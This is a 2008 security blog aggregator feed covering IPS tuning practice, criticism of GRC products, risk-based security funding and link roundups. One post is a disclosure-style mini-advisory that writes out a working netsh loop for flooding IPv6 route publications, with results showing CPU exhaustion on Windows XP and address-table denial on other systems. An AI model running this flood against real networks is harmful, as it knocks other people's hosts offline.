Posted: 14 May 2008 12:00 AM CDT

IPS - is it soup yet? Mike Chapple says yes and no [StillSecure, After All These Years]

Posted: 13 May 2008 08:25 PM CDT

Mike Chapple over at SearchSecurity has a good article up on whether IPS is mature enough for enterprises to deploy. Some may say that Mike has been asleep at the wheel, because certainly there have been plenty of IPS appliances sold over the last 3 to 4 years. Mike comes to the same conclusion I did almost 2 years ago in this article: namely, that the selling and marketing of IPS has far outstripped the actual performance of these devices. As Chapple says, "While today's IPS devices can keep up with high-speed network connections and process rulebases more efficiently, I'm not sure that the technology itself has matured; in fact, it hasn't really changed much at all."

Just as I said back then, people today are still using IPS as IDS. In spite of what Richard Stiennon said back in 2003, that is still the case. Those who have ventured beyond pure IDS do so on a limited basis. Mike lays out three best practices that most who are successful with IPS adopt:

  1. Run the IPS in "monitor" mode until it's clear that the system is properly tuned. We have been recommending this with our Strata Guard IDS/IPS for years. In fact we have a tuning wizard which gives you a real leg up in getting started with your tuning. In essence, though, this means that you start off not blocking anything, and only after seeing what is really happening on your network do you selectively start enabling blocking of specific types of attacks. You don't just turn on every rule to block. This advice is similar to what our best practices in NAC recommend as well.
  2. Keep the number of "block" mode rules to a small, finely tuned set. Again, this has been the reasonable route for a while now. Most IPS today run in a hybrid IDS/IPS mode. Be selective in what you want to actually block versus what you just want to alert on and/or log. Too many rules set to block will lead to failure. Being smart about which rules are set, and grouping attacks so they trigger a minimum number of rules, is key. I have seen rule sets where one kind of attack can trigger multiple signatures. This will fire more blocks than necessary and burden your system for no reason. Don't overlap your rule sets if you are using Snort!
  3. Consider using a fail-open device. In-line devices are a single point of failure. If your IPS does not offer some sort of bypass or other fail-open device, you are asking for trouble. Also, don't settle for the sales guy telling you the software or appliance is designed to fail open; in a power failure that isn't going to help. Make sure it is a self-powered bypass to be sure.
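The hybrid alert/block posture the three practices above describe can be sketched in a few lines. This is a purely illustrative model, not the behavior of any real IPS product; the rule names, categories, and `dispose` function are all made up for the example:

```python
# Illustrative sketch of a tuned hybrid IDS/IPS policy:
# a small, finely tuned set of rules actually blocks, everything
# else only alerts, and an unhealthy sensor fails open.

BLOCK_RULES = {"sql-injection", "known-worm-propagation"}      # keep this set small
ALERT_RULES = {"port-scan", "suspicious-user-agent", "policy-violation"}

def dispose(signature, sensor_healthy=True):
    """Return the action taken when a signature matches."""
    if not sensor_healthy:
        return "pass"       # fail open: the IPS must never become the outage
    if signature in BLOCK_RULES:
        return "block"      # the tuned block set
    if signature in ALERT_RULES:
        return "alert"      # monitor mode: log it, let the traffic through
    return "pass"
```

Starting with `BLOCK_RULES` empty and promoting signatures into it only after watching the alerts is exactly the "monitor first, block selectively" progression described above.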

All in all it was a good validation for me to read this article. I think IPS is at a critical mass of adoption today, I just don't think it has reached a critical mass of utilization yet.  But progress is being made.

A Few Upcoming Presentations [Anton Chuvakin Blog - "Security Warrior"]

Posted: 13 May 2008 05:53 PM CDT

Just wanted to highlight a few of my upcoming presentations, live and web-based:

"Anton live:"
Webinars and webcasts:
Enjoy!

UPDATED: 5/13/2008

More On Non-lethal Weapons: Electrified Shieds [Anton Chuvakin Blog - "Security Warrior"]

Posted: 13 May 2008 05:25 PM CDT

Two quotes are enough, really:

"The kit "features a peel and stick perforated [f]ilm, power supply and necessary conversion equipment. This laminate becomes electrified providing a powerful deterrent to protect officers and keep suspects or rioters at bay." What could possibly go wrong?"

Love that last sentence...

and

"It's all part of the Office of Law Enforcement Technology Commercialization's Mock Prison Riot"

Wow, a prison riot, what a fun event! ;-)

Read here.

GRC is Dead [securosis.com]

Posted: 13 May 2008 03:26 PM CDT

I have to admit, I don’t really understand greedy desperation. Or desperate greed. For example, although I enjoy having a decent income, I don’t obsess about the big score. Someday I’d like a moderate score for a little extra financial security, but I’m not about to compromise my lifestyle or values to get it. As a business I know who my customers are and I make every effort to provide them with as much value as possible.

That’s why I don’t grok this whole GRC obsession (Governance, Risk, and Compliance) among certain sectors in the vendor community. It reeks of unnecessary desperation like the happily married drunk at the bar seething at all the fun of the singles partying around him. He’s got it good, but that’s not enough.

One of the first things I covered over at Gartner was risk management, and I even started the internal risk research community. This was before SOX, and once that hit a few of us started adding in compliance coverage. Early on I started covering the predecessors to today’s GRC tools, and was even quoted in Fortune magazine saying there was almost no market for this stuff (some were predicting it would be billions). That, needless to say, pissed off a few vendors. Most of which are out of business or on life support.

Gunnar Peterson seems to feel the same. He sees GRC as letting your company become audit-driven, rather than business-driven. He is, needless to say, not betting his career on GRC.

Now I’m about to rant on GRC, but please don’t mistake this as criticism of governance, risk management, or compliance. All are important, and tightly related, but they are tools to achieve our business goals, not goals in and of themselves.

GRC however is a beast unto itself. GRC is now code for “selling stuff to the C-level”. It has little to do with real governance, risk, and compliance; and everything to do with selling under-performing products at inflated prices. When a vendor says “GRC” they are saying, “here’s our product to finally get us into the Board Room and the CEO’s office”. The problem is, there isn’t a market for GRC. Let’s look at the potential buyers:

  1. C-Level Executives (the CEO and CFO)
  2. Auditors (internal)
  3. Auditors (external)
  4. Business unit managers (including the CSO/security).

Before going any further let’s just knock off external auditors, since they aren’t about to spend on anything except their own internal tools, which GRC doesn’t target.

Now let’s talk about what GRC tools do. There is no consistent definition, but current tools evolved from the SOX compliance reporting tools that appeared when Sarbanes-Oxley hit. These tools evolved from a few places, but primarily a mix of risk documentation and document management. They then sprinkled in controls libraries licensed from the Final Four accounting firms. I was never enamored by these tools, since they did little more than help you document processes. That’s fine if you charge reasonable prices, but many of these things were overinflated, detached from operational realities unless you dedicated staff to them, and often just repurposed products which failed at their primary goal. Most of the tools now are focused on providing executives with a “dashboard” of risk and compliance. They can document controls, sometimes take live feeds from other applications, “soft-test” controls (e.g., send an email to someone to confirm they are doing what the tool thinks) and generate reports. Much of what we call GRC should really be features of your ERP and accounting software.

In the security world, most of what we call GRC tools are dashboard and reporting tools that survey or plug into the rest of our security architecture. Conceptually, this is fine, except we see the tools drifting away from being functional for those with operational responsibilities, and focusing more on genericizing content for the “business” audience and auditors. It’s an additional, very highly priced, reporting layer.

That’s why I think this category is not only dead, it was never born. There is no one in an enterprise that will use a GRC tool on a day to day basis. The executives want their reports at the end of the quarter, and probably don’t mind a dashboard to glance at, but they’ll never drill down into all the minutiae of controls that probably aren’t what’s really being used in the first place. It’s not what they’re paid for. Internal auditors might also use reports and status checks, but they can almost always get this information from other sources. A GRC tool provides almost no value at the business unit level, since it doesn’t help them get their day to day jobs done.

The pretty dashboards and reports might be worth a certain investment, but not the six-figure plus fees most of them run for. No one really needs a GRC tool, since the tools don’t really perform productive work.

We’re seeing an onslaught of security (and other) vendors jumping on GRC because they think it will get them access to the CEO/CFO and bigger deals. But the CEO and CFO don’t give a rat’s ass how we do security; they just need to know if they are secure enough. That’s what they hire the CSO for, and it’s the CSO’s job to provide the right reports. These vendors would be better served by making great products and building in good reporting and management features to make the jobs of the security team easier.

Focus on helping security teams do their jobs and getting the auditors off their backs, rather than selling to a new audience that doesn’t care. Stop trying to sell to an audience (the CEO) that doesn’t care about you, when you have plenty of prospects out there drooling over those rare, good, functional products. Plenty of products get a boost from compliance, but they aren’t dedicated to it.

Don’t believe me? Go look at what people are really buying. Go ask your own CEO if he wants the latest GRC tool and will pay for it. Ask him if he wants to talk to any more vendors. Ask the operational guys if it will help them get their jobs done.

GRC is a feature, not a product. It’s a reporting tool, not a new paradigm for doing business.

As for the “practice” of GRC? I wouldn’t bet my career on a buzzword created by a small group of vendors to sell more product and jump on the bandwagon of yet another buzzword (compliance).

Compliance is real. Risk management is real. Governance and security are real. GRC is an unrequited wet dream leaving a rash of vendor blueballs in its wake.

Interesting Information Security bits for May 13th, 2008 [Infosec Ramblings]

Posted: 13 May 2008 01:40 PM CDT


Hi folks. Here are some things to take a look at.

Dave Whitelegg has written a tutorial for Appscan.

Jeremiah points out three good reads on web application security.

Jeff Jones points us to a missive penned by Dr. Crispin Cowan about User Account Control and whether it is a convenience feature or a security feature. I won’t spoil the surprise. Go give it a gander.

Techdulla has a post up about a new hire, and there are some tidbits in there that are very good.

Jack has a list of some good Information Security based podcasts that you should check out.

There ya go. Have a great one.

Kevin

XP IPv6 DoS & IPv6 Networking Issues with W2K3 and Ubuntu (Also a DoS) [360 Security]

Posted: 13 May 2008 01:30 PM CDT

Back in May of 2007, I was doing some research into IPv6. I had a single host (Windows XP SP2) and an IPv6 router (Server 2K3), and I was publishing addresses via the router. As I was publishing addresses, I started to notice that they were continually being added to the XP host; new addresses never replaced older ones, and there seemed to be no upper limit on the number of addresses.

I decided to investigate further and set up a simple loop to publish numerous routes. Interestingly enough, every published route was received and recorded by the host. I only tested 7500 addresses, but at the end of this I was seeing some interesting results, which I've detailed in the advisory below.

Given the results, I decided to contact the MSRC and report it. Since Microsoft's current stance is that Denial of Service is a stability issue and not a vulnerability (I guess we've removed the A from CIA), they weren't releasing a security advisory for this, but instead mentioned that they'd include a fix in XP SP3. They also asked that I follow their responsible disclosure guidelines and not release details until they had patched it.

Given that XP SP3 is now floating around publicly, I wanted to blog to mention this issue, so I contacted the MSRC to ensure that the fix had been included. After about a week, the response I received was that due to an extensive bug list, they had decided not to include this fix.

Since I had mentioned my desire to blog on this issue, they asked that I send them my blog post for review prior to posting it. Since that's done... I now present you with the mini-advisory that I wrote and shared internally almost 12 months ago. It's nothing amazing on a single XP host but it is obviously an issue.

--- Original Mini-Advisory (Sent to Microsoft) ---

Title:
Minor Denial of Service via IPv6 Address Publication


Background:
An IPv6 Router (in this case a 2k3 server) will publish an address for every route that it knows. There doesn't seem to be a limit on how many IPv6 Addresses can be published. If you continually add new routes, it will continually publish new routes. Every IPv6 device on the subnet will listen for these published addresses and add them to its interface.
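To make the background concrete: under stateless autoconfiguration, each published /64 prefix yields one more address on every listening host, typically formed from the prefix plus a modified EUI-64 interface identifier derived from the MAC. The sketch below (Python standard library only; the prefix and MAC are made-up example values) illustrates that derivation:

```python
import ipaddress

def eui64_interface_id(mac: str) -> int:
    """Derive the modified EUI-64 interface identifier from a MAC address:
    flip the universal/local bit of the first octet and insert ff:fe in the middle."""
    b = bytes(int(x, 16) for x in mac.split(":"))
    b = bytes([b[0] ^ 0x02]) + b[1:3] + b"\xff\xfe" + b[3:6]
    return int.from_bytes(b, "big")

def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """Form the autoconfigured address a host adds for one published /64 prefix."""
    net = ipaddress.IPv6Network(prefix)
    return net[eui64_interface_id(mac)]

# One published prefix -> one more address on the host's interface.
addr = slaac_address("2001:db8:0:1::/64", "00:11:22:33:44:55")
```

Since the host repeats this for every route advertisement it hears, a router publishing thousands of /64s hands the host thousands of addresses to configure, which is the behavior being abused here.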


What I did:
On my IPv6 router I set up a simple for loop that would effectively add 9999 x 9999 routes to be published; each route would be advertised to the subnet.

Command:
C:\Documents and Settings\Administrator>for /L %k in (0, 1, 9999) DO for /L %i in (0, 1, 9999) DO netsh interface ipv6 add route 2001:db8:%k:%i::/64 "Local Area Connection" publish=yes


Results:
So far, I've added ~7500 addresses... CPU utilization on my XP machine receiving the addresses never drops from 100%. What's more interesting though is the output of the two commands below:

ipconfig

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
An internal error occurred: The file name is too long.
Please contact Microsoft Product Support Services for further help.
Additional information: Unable to query host name.

netsh interface ipv6 show address

C:\Documents and Settings\Administrator>netsh interface ipv6 show address
Querying active state...
No entries were found.
The file name is too long.


Caveats:
It appears that this only works if the XP hosts are on the network while you are publishing addresses. If you add the addresses and a new host then comes online, it appears to receive only the last ~50 addresses. However, if the machine is on the network as each address is published, it seems to obtain every address published and just keeps appending them.


May 2008 Updates:

I decided to check other operating systems to see how they responded. I went with Server 2003 and Ubuntu (and another XP test case). The results were interesting. It seems as though other operating systems have protections against this flood built in: Server 2003 limits itself to 9600 IPv6 addresses, and Ubuntu limits itself to 16. Meanwhile, after 24 hours of testing using the simple for loop described above (which has its own drawbacks, including the requirement that it add each of these addresses to the IPv6 router; a program designed specifically to flood these multicast packets out would be much more efficient), I have published over 20K addresses and the XP host is trying its hardest to pick them all up. ipconfig and netsh are unresponsive the majority of the time (every now and then they'll successfully print the addresses), and my CPU is constantly held at 100% by svchost.exe (running as SYSTEM).

This could be interesting with a large network of XP hosts and a script dedicated to publishing large quantities of IPv6 addresses. Especially since these are small multicast packets with minimal amounts of data contained within them.

While you can't flood the 2K3 and Ubuntu systems, something interesting does happen: when they hit their limit, they seem to just ignore future published addresses. This could be a potentially bigger problem than simple CPU exhaustion. I will state first that this discussion could be entirely theoretical at this point, as I had a single test case, but here's a thought for you. Ubuntu hits its 16-address limit and Server 2003 hits its 9600-address limit; what happens the next time a valid address is published? Neither of these hosts updated their address lists as I published new ones, suggesting you could deny hosts the ability to learn new addresses.
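The two observed failure modes can be contrasted with a small, purely hypothetical simulation; the caps below are just the limits observed in the testing above, and the simulation obviously says nothing about how the real stacks are implemented:

```python
def receive_published_addresses(published, cap=None):
    """Simulate a host adding autoconfigured addresses as prefixes are published.

    cap=None models the observed XP behavior (unbounded accumulation, CPU burn);
    a finite cap models Server 2003 (9600) or Ubuntu (16), where later prefixes,
    legitimate or not, are silently ignored once the limit is reached.
    """
    addresses = []
    for addr in published:
        if cap is not None and len(addresses) >= cap:
            continue  # at the limit: the new address is simply dropped
        addresses.append(addr)
    return addresses

# An attacker publishes 20 bogus prefixes, then a legitimate one arrives late.
flood = [f"2001:db8:bad:{i:x}::1" for i in range(20)]
xp = receive_published_addresses(flood)              # keeps every one of them
capped = receive_published_addresses(flood, cap=16)  # stops at 16; late arrivals are lost
```

Under the capped model, an attacker who fills the table first denies the host any subsequently published legitimate address, which is the denial scenario sketched in the paragraph above.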

This begs the question: which is the bigger security risk, flooding your client operating system and forcing 100% CPU utilization, or ensuring your server environments can't learn new published addresses?

Appropriate funding [RiskAnalys.is]

Posted: 13 May 2008 07:24 AM CDT

Because many organizations are beginning to wrestle the funding beast at this time of year, I thought I’d focus this week’s post on the question of “appropriate funding”.  It only tangentially touches on the question of communicating about risk, but I’ll return to part two of that series next week.

One of the arguments I've heard folks use to dismiss the notion of a risk-based approach to security is that it's been tried and failed.  The argument goes on to claim that it isn't possible to get appropriate funding for security because management just doesn't "get it".  And, while I agree that many (most?) past attempts at risk-based security have struggled, I'd submit that it was because the methods used didn't address risk effectively.  They often focused solely on worst-case outcomes (which is the Chicken Little problem), didn't apply any rigor in determining risk, simply focused on vulnerability (but called it "risk"), or treated the problem as a possibility issue versus a probability issue. 

Of course, the argument about funding begs the question of what constitutes "appropriate funding".  It's naive (or arrogant) to believe that I — as an information security professional — am in a position to understand the incredible mix of business issues that determine the right risk-balance for an organization.  Running a business requires weighing the various risk-domains management faces (investment, insurance, product, market, security, etc.) as well as complex value propositions in light of the organization's objectives and limited resources.  And, while it's imperative that information security professionals seek to understand the business side of the equation, we are never going to have the same breadth and depth of vision into the organization's unique mix of business issues that executive management has.  Combine that with the fact that it isn't our risk tolerance that matters, and it should be crystal clear that complaints of being "underfunded" have to be cast in the light of "Compared to what?".  Compared to what we think it ought to be?  Compared to some industry baseline of questionable applicability to our organization?

Of course, I struggled to get management support for years.  I tried leveraging fear, uncertainty, and doubt.  I also tried the old "You have to do it because it's best practice" card.  And although both of these can work for a while, at the end of the day, management's perspective will likely be that you're paranoid and you lack perspective about the nature of running a business.  I've come to the conclusion that if I believe I'm underfunded, then it's likely:

  • I haven't done a good job of communicating risk to the business, 
  • I don't sufficiently understand the risk tolerance of the organization's leadership, and/or
  • I don't understand the mix of competing risk issues, resource limitations, or business objectives.  

It's my responsibility to see that I'm not underfunded by providing high quality (unbiased) risk information to management.  If I do that, then I can expect to receive an appropriate level of funding given the other business considerations management faces and their risk tolerance.  The funding may be less than I'd like given my risk tolerance, but that's a personal problem. 

Frankly, since taking a risk-based approach to my job, I've had very little difficulty getting management support for the stuff that matters most.

Processing ported to Javascript. [NP-Incomplete]

Posted: 13 May 2008 01:01 AM CDT

The domain-specific visualization language Processing has been ported to Javascript. This is a "good thing". Thanks to Raffael Marty for the heads up. Also, this is my 100th post.
